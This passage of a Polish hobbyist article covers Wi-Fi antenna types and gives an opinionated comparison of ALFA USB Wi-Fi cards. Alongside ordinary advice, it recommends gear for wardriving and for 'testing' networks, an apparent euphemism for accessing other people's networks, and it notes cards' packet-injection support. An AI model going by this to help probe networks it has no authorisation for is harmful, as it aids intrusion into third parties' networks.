Baza która znajduje się w punkcie „A”. Zakładamy że klient „C” oraz „B” znajdują się w takiej samej odległości od bazy, po linii prostej. Baza ma antenę zamontowaną na najwyższym piętrze i jest skierowana w stronę klienta „B”, komunikacja między nimi przebiega bez zakłóceń. Niestety klient „C” nie mieści się w kącie promieniowania bazy. Mimo że baza jest przez niego opromieniowana, nie jest w stanie ani odebrać od niego sygnału ani mu odpowiedzieć, ponieważ jest ustawiona w inną stronę. Aby naprawić błąd administratora sieci trzeba by było przenieść klienta „C” na wyższe piętro lub zastosować inna antenę o szerszym kącie promieniowania w pionie.

4. Polaryzacja – inaczej płaszczyzna w której zmienia się pole elektryczne. Na potrzeby 802.11 używamy anten o polaryzacji liniowej, pionowej lub poziomej. Przy doborze należy uwzględni ten parametr tak aby anteny które mają ze sobą działać miały tą samą polaryzację.

Typy anten i ich zastosowanie.

Omni directional/dookólna (prętowa)

Najpopularniejsza antena wifi, jej promieniowanie to pręt, zazwyczaj ustawiony pionowo. Znane są nam jako krótkie plastikowe patyki oraz długie zewnętrzne promienniki zamknięte w rurce PCV. Anteny te mają 360 stopni promieniowania w poziomie i od  40 do 10 stopni w pionie. Zazwyczaj im antena dłuższa a jej zysk większy tym kąt promieniowania węższy, oczywiście istnieją odstępstwa od tej zasady spowodowane budową promiennika.

Zastosowanie: wardriving – jako jedyna nadaje się do przylepienia na samochodzie i zbierania informacji o sieciach z wszystkich stron. Krótkie anteny omni mają stosunkowo szeroki kąt promieniowania w pionie, dlatego nadają się do stosowania w domach piętrowych.

Omni / sufitowa

Antena która charakteryzuje się stożkowym kształtem, bardzo szerokim kątem promieniowania w pionie i 360 stopniami promieniowania w poziomie. Anteny tego typu budowane są na wiele sposobów, niektóre z uwagi na możliwość stosowania tylko w pomieszczeniu zamkniętym wykorzystują odbicia od ścian budynku. W praktyce anteny tego typu, mimo zapewnień producenta, słabo spisują się gdy ilość kondygnacji rośnie wyżej 2. Niektóre z tych anten posiadają tylko 180 stopni promieniowania w dół z całkowitym pominięciem 180 stopni w górę.

Zastosowanie: w pomieszczeniach zamkniętych, oraz do pokrycia piętrowych budynków.

Panelowa

Popularny typ anteny do połączeń na nieduże odległości do 1-2km, posiadają średni zysk kierunkowy i około 30-35 stopni promieniowania w pionie i poziomie. Wiele osób mylnie uważa, że nadają się do wardrivingu.

Zastosowanie: antena kliencka na nieduże odległości

Mikropasmowa (odmiana panelowej)

Wyglądem zbliżona do typowej anteny panelowej, ale często jest mniejsza i chudsza. Wykonane z laminatu zapewniają dużą powtarzalność parametrów i odporność na warunki atmosferyczne.

Zastosowanie: antena kliencka na nieduże odlegości.

Cylindryczna – yagi 

Kolejna typowa antena kliencka lub punkt do punkt. Nie nadaje się do wardrivingu. Tanie i proste w budowie, nie wymagają dokładnego ustawiania. Charakteryzują się promieniowaniem 40-45 w pionie i poziomie.

Zastosowanie antena kliencka na nieduże odległości

Grid – paraboliczna

Anteny składające się reflektora i promiennika, charakteryzują się wąskimi kątami promieniowania i dużą kierunkowością. Kąt promieniowania w ich przypadku wynosi zazwyczaj 10-20 stopni, co sprawia że antena jest kłopotliwa w ustawieniu. Reflektor może być w postaci czasy lub siatki.

Zastosowanie: punkt do punkt na duże odległości

Szczelinowa

Antena składająca się z elementu przewodzącego w którym wycięte są otwory o wielkości promiennika. Promieniowanie w pionie to bardzo wąskie 10 stopi i aż 120-160 w poziomie. Antena tego typu może posiadać otwory z obu stron co czyni ją prawie omni. 2*120 stopni w poziomie.

Zastosowanie: stacja bazowa

Sektorowa

Jest to antena o szerokim kącie promieniowania w poziomie (60-180 stopni) i bardzo wąskim w pionie (4-10stopni). Anteny często łączy się po kilka aby stworzyć antenę omni.

Zastosowanie: stacja bazowa

 Co ja mam wybrać?

Na potrzeby wardrivingu, polecam anteny dookólne na podstawie magnetycznej o zysku od 5 do 9dBi. Doskonale trzymają się na samochodach i nie rzucają się w oczy.

Dla amatorów „testowania” sieci także polecam anteny omni, szczególnie na blokwiskach, na niedużych odległościach. Gdy poziom szumów uniemożliwia używanie anteny omni możemy zastosować Yagi lub antenę panelową. Przy jej wyborze należy zwrócić uwagę na jej kąty promieniowania.

Do domu dla routera wystarczy zwykły patyk 3-5dBi, gdy chcemy pokryć dwa piętra o niedużej powierzchni to albo antena sufitowa albo krótki patyk 3dBi.

Czego nie wybierać ?

Do WD oraz testowania nie nadają się parabole, grid-y z powodu wąskiego promieniowania w pionie i poziomie.

Małych anten kierunkowych ala ANT2406A i podobnych innych firm, nie są one ani kierunkowe ani omni a zysk pozostawia dużo do życzenia. Aluminiowy ekran na zwykłym patyku często daje większy zysk kierunkowy niż w/w dedykowane rozwiązanie.

Anten bez nazwy lub chińskich producentów jak Pentagram, Cerberus, Digitus.

Polecane modele:

Wardriving:

  • TP-Link ANT2405C – dobry zysk, silny magnes, gumka całej powierzchni bazy magnetycznej, nie rysuje karoserii. Antena nie spada nawet do 250km/h.
  • TP-Link ANT2408C – dobry zysk, silny magnes, małe gumki na rogach nie pozwalają się jej ześlizgnąć. Niestety antena potrafi się złożyć, a jeżeli ktoś ją zabezpieczy np. taśmą potrafi spać przy hamowaniu lub w zakręcie.
Zastosowania domowe (do routera):
  • standardowe anteny dodawane do markowych Access Pointów zazwyczaj są bardzo przyzwoite. Na wyróżnienie zasługują firmy TP-Link oraz Tonze które do swoich produktów w 95% przypadków dodają anteny o realnym zysku 4-5dBi.
  • TP-Link ANT2405CL
Do „testowania” omni:
  • TP-Link ANT2405CL
  • TP-Link ANT2408CL
  • Tonze 5dBi (dodawane do UW-6200R/H, przypomina ANT2405CL)
  • ALFA 6dBi (chuda długa)
  • YST 7dBi (bardzo chuda i miękka, plastik osłaniający promiennik posiada lewo skrętny gwint, którego zadaniem jest utwardzenie obudowy promiennika, antena jest bardzo delikatna)
  • Techniclan 5dBi (zazwyczaj dodawane do WUSB-150NH)
Do „testowania” zew. omni:
  • Horizon Maxi/Midi/Mini – 12/9/7 dBi 360 stopni w poziomie oraz 6/15/25 stopni w pionie.
Do „testowania” panel:
  • TetraAnt 2 08 75 – 8dBi kąty: 75/65 stopni
  • TetraAnt 2 14 35 – 14dBi kąty: 39/38 stopni
  • TetraAnt 2 19 20 – 19dBi kąty: 20/20 stopni
Do „testowania” yagi:
  • Netus Yagi 12dBi – kąty 50/50 stopni
  • Netus Yagi 16dBi – kąty 25/25 stopni

Do „testowania” szczelinowa i sektorowe: (tylko w ekstremalnych wypadkach gdy wiemy co robimy)

  • OSBridge XL – 11dBi 140/15 stopni (pochył +15 stopni)
  • OSBridge L – 9dBi 120/20 stopni (pochył +15 stopni)
Amatorskie stacje bazowe:
  • UBNT-AIRMAX-SEC-2G-120-15 kąty 120/15 stopni (bardziej profesjonalna)
  • Horizon Maxi/Midi/Mini – 12/9/7 dBi 360 stopni w poziomie oraz 6/15/25 stopni w pionie. (wersja tania)
Do ogródka za domem, niezabudowany plac do 2tyś m^2, zalesiony obszar do 1tyś. m^2:
  • Horizon Mini – 7dBi 25 360/25 stopni
  • Netus Sektor – 19dBi 140/12 stopni
  • OSBridge L – 9dBi 120/20
Do domu max. dwie kondygnacje: (gdy absolutnie nie ma możliwości zastosowania dodatkowego sprzętu na każde piętro) 
  • Seneo ICMA 24005 – 3dBi
  • Krótki patyk 3-5dBi
Zadania specjalne
  • HotSpot, który laptop odbiera nam przy oknie albo nawet tylko na balkonie… normalnie napisał bym, że się nie da, ponieważ „brak widoczności = brak linku” ale sam wiem, że czasem trzeba! W takiej sytuacji stosujemy antenę o niskim zysku i szerokim kącie promieniowania w poziomie i możliwie szerokim w pionie, czyli: Horizon Mini lub TetraAnt Panel 2 08 75.
  • Przeprawa przez budynek, brak widoczności = brak linku. Nie ma możliwości pokonania budynków, nie istnieją anteny które były by w stanie coś takiego wykonać. Przeprawę robimy nad budynkiem, stosując maszty lub na budynku który chcemy ominąć stosujemy sprzęt przekazujący sygnał, np. most zestawiony za pomocą dwóch routerów, połączonych razem lub bardziej profesjonalnie RB433AH z dwoma interfejsami. Obalmy mity, wykonywanie linków, rykoszetów od innych budynków gdy, nie widzimy celu także nie da na stabilnego linku.  
  • Małe odległości przez ściany do 20-30m, w obrębie jednego poziomu, przez 3-4 ściany możemy zastosować anteny TP-Link ANT2408CL oraz mocny i czuły AP np. TP-Link WR1043ND które generuje moc nawet do 1W oraz w komputerze silniejszą kartę o mocy 200mW to nie powinno być problemów.
  • Długość kabla a tłumienie, każdy metra koncentryka H155 odejmuje na około 0,5dB, czyli 10m daje nam 5dB. Można też zastosować H1000 o tłumieniu 0,2dB/1m co po 10m daje zaledwie 2dB. Inne rozwiązanie to wzmacniacz, najlepiej montowany zaraz przy antenie. Takie rozwiązanie jest nam w stanie zrekompensować nawet bardzo długi kabel., niestety cena przyzwoitego wzmacniacza to około 200-300zł.
Podsumowanie
Wszystko co zostało tu napisane ma charakter informacyjny, czasem dobrze jest sprawdzić sprzęt przed zakupem, pożyczając go aby nie narażać się na niepotrzebne wydatki.

 

Którą kartę wifi, firmy ALFA wybrać ? (Alfa Network)

Ten temat powraca już od dobrych kilku lat, każdy chce ją mieć, każdy uważa je za najlepsze rozwiązanie! Ale czy to prawda ?

Na początek wszystkie modele które bierzemy pod uwagę:

1. AWUS036H (2.0) moc: 1W układ: RTL8187L

2. AWUS036NHA moc:800mW układ: Atheros AR9271

3. AWUS050NH(2.0)/AWUS051NH moc: 500mW układ: RaLink RT2770

4. AWUS036NH moc: 2W układ: RaLink RT3070

5. AWUS036NEH moc: 1W układ: RaLink RT3070

6. AWUS036EW moc: 500mW układ: RTL8187L

7. AWUS036EH moc: 200mW układ RTL8187L

8. AWUS036NHR moc: 2W układ RTL8188RU

9. AWUS050NH(1.0) moc: 500mW układ RT2770

 

AWUS036H

Najstarsza i bardzo popularna karta, mimo wiekowego (10 letniego) układu nadal trzyma cenę. Generuje moc około 1W, osiąga prędkość do 54Mbit i posiada wyprowadzoną tylko jedną antenę. Idealnie sprawuje się w każdych warunkach, działa z każdym linux-em od czasów kernel-a 2.4! Wstrzykuje, zmienia mac itp.

Zalety:

  • kompatybilność z każdym systemem, nawet bardzo starym
  • kompatybilność z każdym programem do …
  • czułość

Wady:

  • CENA
  • wysoka niestabilność połączenia
  • zawieszanie się bez większego powodu
  • działa tylko w B/G
  • karta podaje fikcyjną siłę sygnału, oszukuje o przynajmniej +10-15dbm
  • wiekowy układ i wzmacniacz

AWUS036NHA

Najnowsza karta firmy ALFA, pierwszy raz firma zastosowała układ firmy Atheros. Bardzo czuła. Początkowo gdy karta wchodziła na rynek sterowniki do układu AR9271 leżały. Aktualnie karta działa dobrze, niestety w przeciwieństwie do WN722N (która posiada ten sam układ) posiada starą rewizję układu UB91C, co powoduje że do momentu wydania 3.2.26 karta miała problemy z wysokimi prędkościami, łączeniem się z otwartymi sieciami, za czasów 3.0 praktycznie nie była w stanie funkcjonować. Aby karta chodziła lepiej można przerzucić układ z WN722n, oraz lekko zmodyfikować eeprom. Problemy z tą kartą znikają całkowicie na kernelu 3.2 a w 3.4 obiecana jest jeszcze jakaś poprawka.

Zalety:

  • czułość układu
  • stabilna praca
  • N do 150Mbit (N lite)

Wady:

  • CENA
  • problemy z działaniem na wielu kernelach a nawet pod Windows
  • niski injection rate, sytuację poprawia patch w BT5R2PL oraz kernel 3.2

AWUS050NH(2.0)/AWUS051NH

Obie karty 050NH wersja 2.0 oraz 051NH to dokładnie ta sama karta w odróżnieniu od 050NH wersja 1.0 która posiada kilka wad które spowodowały szybkie zakończenie produkcji. Karta posiada dwa zakresy 2.4 i 5GHz a także na małych odległościach potrafi osiągać 300Mbit. Karta posiada dwie anteny, jedna wyprowadzona w postaci RP-SMA oraz druga na PCB w postaci małego wydruku. Karta w otwartym terenie osiąga realną prędkość linków na poziomie 65-75Mbit, w obrębie małych budynków nawet do 140-160Mbit. Układ firmy RaLink zaprojektowany w 2009 roku, wszedł do produkcji pod koniec 2009. Połączenia są stosunkowo stabilne.

Druk karty jest zaprojektowany tak aby karta mogła się stać mini router-em, posiada miejsce na pamięć flash.

Zalety:

  • A/B/G/N
  • 150/300Mbit
  • dwie anteny
  • stabilne połączenia
  • bardzo dobre działanie 5GHz

Wady:

  • CENA
  • średnia czułość

AWUS036NH

Karta wyposażona w dużo nowszy układ firmy RaLink o generację nowszy niż w AWUS051NH, niestety pozbawiony 5GHz. Karta jest lekko podkręconą wersją taniej  karty firmy Accton WUS620-H-JET, według mnie obie karty działają identycznie, z tym że karta firmy Accton to ceną w okolicy 10-15euro. Jest to jedna z najgorszych kart firmy ALFA.

Zalety:

  • działa
  • N do 150Mbit
  • połączenia zestawiane na niedużej odległości są dosyć stabilne

Wady:

  • CENA!!! 
  • niska czułość
  • brak aux-owej anteny
  • niebotyczna moc, która nijak się ma do efektywności działania karty

 AWUS036NEH

Działa troszkę lepiej albo identycznie jak AWUS036NH, posiada ten sam wzmacniacz firmy Sige. Co ciekawe mimo mniejszych rozmiarów i braku charakterystycznej obudowy na druku posiada antenę AUX-ową, niestety nie została ona podłączona i jest nieużywana.

Zalety:

  • rozmiary
  • stabilne połączenia

Wady:

  • cena
  • niska czułość
  • dziwnie wysoka moc

AWUS036EW

Mało popularna karta, wiele osób twierdzi że bazuje ona na mało udanych i bardzo starych produktach firmy AzurWave. Mało udane połączenie układu realtek z wzmacniaczem Sige w wersji 1.0 oraz dużo lepsze realtek + realtek w wersji 2.0

Zalety:

  • działa
  • cena (~100zł)
Wady:
  • średnia czułość, troszkę lepsza niż AWUS036NH
  • mało popularna

AWUS036EH

Karta jest kopią jeden do jeden Loopcomm LP-9187 na której podstawie powstały takie karty jak Tonze UW-6200R/H, The Infinity IP-0800G oraz Techniclan WUSB-54G. Wyjątkowo udane połączenie układu RTL8187L oraz RTL8225. Wszystkie w/w karty fizycznie różnią się tylko i wyłącznie elementami za których pomocą ustawia się moc wzmocnienia. Moc wzmocnienia ustawia się za pomocą dwóch rezystorów oraz kondensatora. Dodatkowo wymiana stabilizatora na tzw. Low RSI powoduje znacznie lepsze działanie karty przy bardzo słabym sygnale a dodatkowo daje jej większą odporność na szum. (Noise Immunity) Karta sprawuje się IDENTYCZNIE z AWUS036H 1W z tą różnicą że znacznie mniej oszukuje na sygnale.

Zalety:

  • czułość
  • stabilność
  • kompatybilność (działa wszędzie i z każdym programem)
  • duża dostępność dokumentacji i oprogramowania
Wady:
  • wiekowy układ

AWUS036NHR

Karta na zupełnie nowym układzie firmy Realtek, jest to karta wypuszczona na dwa miesiące przed AWUS036NHA. Układ karty jest dużo lepszy niż jego poprzednik RTL8187L, dysponuje tylko jedną anteną mimo że druk pozwala wyprowadzić aż trzy. PCB karty jest przygotowany pod inne układy RTL które mogą powiadać MIMO do 300Mbit a nawet miejsce na pamięć flash. Na dzień dzisiejszy karta nie nadaje się do systemu Linux, sterowniki do niej dostępne są tylko dla kilku wersje kernela a ich kompilacja na innych rzadko kończy się powodzeniem.

Zalety:

  • bardzo dobra czułość
  • bez dwóch zdań łączy się z sieciami z którymi AWUS036H się nie połączy
  • dobrze działa w systemie Windows
Wady:
  • CENA
  • pod linux-em, łączy się tylko z bardzo silnymi sieciami, działa monitor mode oraz wstrzykiwanie
  • pod linux-em lubi się zawiesić
  • wymaga najsilniejszego zasilania z wszystkich kart

AWUS050NH 1.0

Nie posiadam tej karty ponieważ gdy próbowałem ją kupić do testów sprzedawca wysłał mi w zamian 051NH. Wiem tylko że karta była sprzedawana po niskich cenach i strony produktu informowały o całkowitym nie działaniu 5GHz. Jak się okazało na wielu formach ludzie pisali że karta działa na 5GHz ale sygnał który odbiera pozostawia dużo do życzenia, dodatkowo karta lubiła zerwać połączenie nawet przy bardzo małych odległościach. Do polski trafiła tylko bardzo mała seria, firma ALFA bardzo szybko zastąpiła ją wersja 050NH 2.0 a potem 051NH które były znacznie lepsze i co najważniejsze nie posiadały w/w wady.

Zalety:

  • cena
  • akceptowalne działanie 2.4GHz
Wady:
  • wada fabryczna opisana wyżej

Rate:

Istnieją tylko dwie karty ALFA które osiągają 300Mbit jest to 051NH oraz 050NH 2.0 które w rzeczywistości są identyczne. 300Mbit jest realne w obrębie jednego pomieszczenia lub na odległości mniejsze niż 10m. Powodem tego jest mikroskopijna antena drugiego kanału, która zlokalizowana jest na bruku. Wszystkie pozostałe karty osiągają 150Mbit dla N oraz 54Mbit dla G. ALFA nie posiada karty z trybem Turbo 108Mbit.

Zasilanie:

Nie ma takiej karty firmy ALFA która wymagała by więcej niż 5V 500mA, najwięcej potrzebuje AWUS036H, AWUS036NHR oraz AWUS036NH, ponieważ momentami ich apetyt sięga 350-450mA ale nie trwa to dłużej niż ułamek sekundy. Są karty które mają problemy z działaniem na USB 1.1 i są to 036H i 036NH ponieważ USB 1.1 w niektórych komputerach nie zapewnia 500mA.

Większość problemów można zażegnać za pomocą hub-a z dodatkowym zasilaniem, ale niestety wszystkie karty są wrażliwe na jakość zasilacz. Słabe konstrukcje lub dobre ale mające swoje lata, które tętnią powodują efekty jak: znikanie karty z systemu, zawieszanie się karty i system a po długim użytkowaniu defekt karty i komputera, o hub-ie nie wspominając. Najlepsze rozwiązanie to zakupić nowy zasilacz impulsowy 5V 2A w sklepie elektronicznym, sprzedawce należy uprzedzić, że potrzebujemy dobrej jakości zasilacz do komputera.

Długość kabla USB:

Długość kabla dla AWUS036H, AWUS036NHR i AWUS036NH nie może przekroczyć 5m ale już na 3-4m mogą pojawić się problemy gdy kabel nie jest ekranowany lub po drodze są złączki. Przy użyciu kabla z repterem można kabel przedłużyć do 20m, przy USB 2 Rj45 forwarder nawet do 90m. AWUS036NH i AWUS036NHR ma problemy z działaniem na niektórych tanich reptereach.

Podróbki:

ALFA jest to najczęściej podrabiana karta wifi jaką znam, abstrahując od produktów typu „ALFA Like” istnieją wersje które wyglądają zupełnie jak oryginał, mają to samo pudełko, bardzo zbliżoną jakość wykonania. Często, mimo wysokiego jakości podróbki mają adres MAC w zakresie firmy Loopcomm oraz kilku innych. Najczęściej podrabiane są jednak wersje specjalne, posiadające dodatki w postacie większej anteny, więcej dodatków itp. Do karty ALFA importują tylko easywifi oraz wasserman. Ostatnie zaczęły się też pojawiać w sklepie internetowym wifik, niestety nie mam żadnych informacji na temat tego sklepu.

Nie istnieje recepta na rozpoznanie oryginału karty. Na pocieszenie dodam tylko że niektóre karty „ALFA Like” są wykonane identycznie jak oryginał, ale dotyczy to głównie AWUS036H 1W.

Podsumowanie:

Według mojej prywatnej opinij najlepsza alfa to AWUS036NHA, głównym jej plusem jest bardzo czuły i stabilny układ który przy tym samym sygnale jest w stanie przepuścić więcej  danych niż rozwiązania na układzie RTL8187L.

Jeżeli jednak nie posiadasz funduszy na AWUS036NHA, polecam wybrać AWUS036EH które wiążą się juz tylko z 100-120 złotymi.

Dla osób które potrzebują 5GHz polecam AWUS051NH, ponieważ jako jedna posiada 5GHz razem z możliwością MIMO do 300Mbit. Niestety jej czułość pozostaje daleko w tyle za AWUS036NHA czy AWUS036EH.

Stanowczo odradzam: AWUS036NH AWUS050NH AWUS036EW AWUS036NHR

Dlaczego odradzam też AWUS036H 500mW oraz 1W?

Karta dla laika wydaje się być dużo lepsza od np. AWUS036EH ale to jest złudzenie. Karta rejestruje dużo gorsze transfery oraz straszliwie sieje uniemożliwiając używanie innych w jej pobliżu. Przy bardzo słabym sygnale co w jej przypadku oznacza 65-75dbm (realnie 75-85dbm) nawet przy sztywnym „rate” na poziomie 1Mbit zacina się po kilku sekundach idle. Sztuczne jej podtrzymywanie za pomocą „keep-alive” pozwala jej utrzymać połączenie przez kilka minuta aż do zerwania, a potem siec znika i jedynie reset (odłączenie) pomaga. Karta używana dziennie po 2-4h nie jest w stanie dożyć max. 2 lat, przy ciągłym użytkowaniu razem z extenderem który proponuje ALFA karta umarła mi po 3 miesiącach. a kolejną którą dostałem w ramach gwarancji przeżyła aż 4! 🙂

Dla czytających:

Wszystkie informacje które tu zawarłem, są oparte o długo trwałe użytkowanie każdego modelu kart firmy ALFA na co dzień oraz dodatkowych testach w stałych warunkach. Zanim zaczniesz się wypowiadać i odnosić do artykułu pomyśl, jaki ty masz punkt odniesienia?

cdn.